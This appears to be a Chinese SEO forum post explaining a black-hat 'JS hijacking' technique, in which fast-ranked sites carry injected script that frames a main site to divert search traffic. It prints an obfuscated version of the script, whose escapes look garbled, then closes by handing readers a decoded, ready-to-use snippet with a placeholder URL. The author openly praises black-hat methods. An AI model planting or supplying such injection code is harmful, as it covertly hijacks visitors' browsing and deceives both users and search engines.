關于劫持：JS劫持手法

有關黑帽的具體操作網上少之又少，基本都標題黨。

剛好最近碰到一個群友在吹他的快排，就拿他的來做個講解。

我看了他的網站，就只能看出JS劫持，其他我也不懂，就講講這個吧。

暫時他有三個網站，指數5000左右的詞都排首頁前5位，大家先看看數據(提醒：拿別人的網站來分析，切勿放上網址及網站信息，斷人財路等于殺人放火)

短時間內有這樣的數據，50%做了快排。

這樣看快排的幾率90%了

這里提醒下各位站長，快排來得快去得也快，這是鐵律。能給你幾個月的快感，百度一更新就難翻身，切記切記。

但我個人比較向往黑帽，因為厲害啊。

看了他的網站代碼，里面都有一個奇怪的JS代碼

window[“x64x6fx63x75x6dx65x6ex74”][‘x77x72x69x74x65x6cx6e’](“x3cx73x63x72x69x70x74 x6cx61x6ex67x75x61x67x65 x3d

x6ax61x76x61x73x63x72x69x70x74x3e”);window[“x64x6fx63x75x6dx65x6ex74”][‘x77x72x69x74x65x6cx6e’]

(“x64x6fx63x75x6dx65x6ex74x2ex77x72x69x74x65x28″x3cx66x72x61x6dx65x73x65x74 x72x6fx77x73x3dx27x31x30x30x25x2cx2ax27

x66x72x61x6dx65x62x6fx72x64x65x72x3dx27x4ex4fx27 x62x6fx72x64x65x72x3dx27x30x27

x66x72x61x6dx65x73x70x61x63x69x6ex67x3dx27x30x27x3e”x29x3b”);window[“x64x6fx63x75x6dx65x6ex74”][‘x77x72x69x74x65x6cx6e’]

(“x64x6fx63x75x6dx65x6ex74x2ex77x72x69x74x65x28″x3cx66x72x61x6dx65 x6ex61x6dx65x3dx27x6dx61x69x6ex27

x73x72x63x3dx27x68x74x74x70x3ax2fx2fx77x77x77x2eu4f60u7684u7f51u5740x2ex63x6fx6dx27

x73x63x72x6fx6cx6cx69x6ex67x3dx79x65x73x3e”x29x3b”);window[“x64x6fx63x75x6dx65x6ex74”][‘x77x72x69x74x65x6cx6e’]

(‘x64x6fx63x75x6dx65x6ex74x2ex77x72x69x74x65x28x22x3cx2fx66x72x61x6dx65x73x65x74x3ex22x29x3b’);window[“x64x6fx63x75x6dx65x6ex74”]

[‘x77x72x69x74x65x6cx6e’](“xx33x63x2fx73x63x72x69x70x74x3e”);

是不是很奇怪

其實這個是經過加密的JS劫持代碼，經常會出現在被黑的網站里面，劫持流量。

解密后發現都是指向一個網站，我們再看看那個網站的數據

能肯定這個估計就是主站了，手法就是通過快排一些網站上排位然后JS劫持流量到主站做排名。

那肯定你們會問，為什么這么大費周章不直接就去快排主站算了。

因為主站不能被K，而快排站無所謂，說明一下，百度蜘蛛現在是不能識別JS代碼的，一旦懲罰，主站不會被牽連，

而且這位朋友手法成熟，快排站與主站做的行業和關鍵詞都一致，一旦跳轉，主站的流量來源都會是行業關鍵詞，想法很好。

好了，點到為止，希望能給你們一點幫助，最后奉上JS代碼。

document.writeln(“<script language = javascript>”);

document.writeln(“document.write(“<frameset rows=’100%,*’ frameborder=’NO’ border=’0′ framespacing=’0′>”);”);

document.writeln(“document.write(“<frame name=’main’ src=’http://www.你的網址.com’ scrolling=yes>”);”);

document.writeln(‘document.write(“</frameset>”);’);

document.writeln(“x3c/script>”);

作者：time表 來源：百度站長社區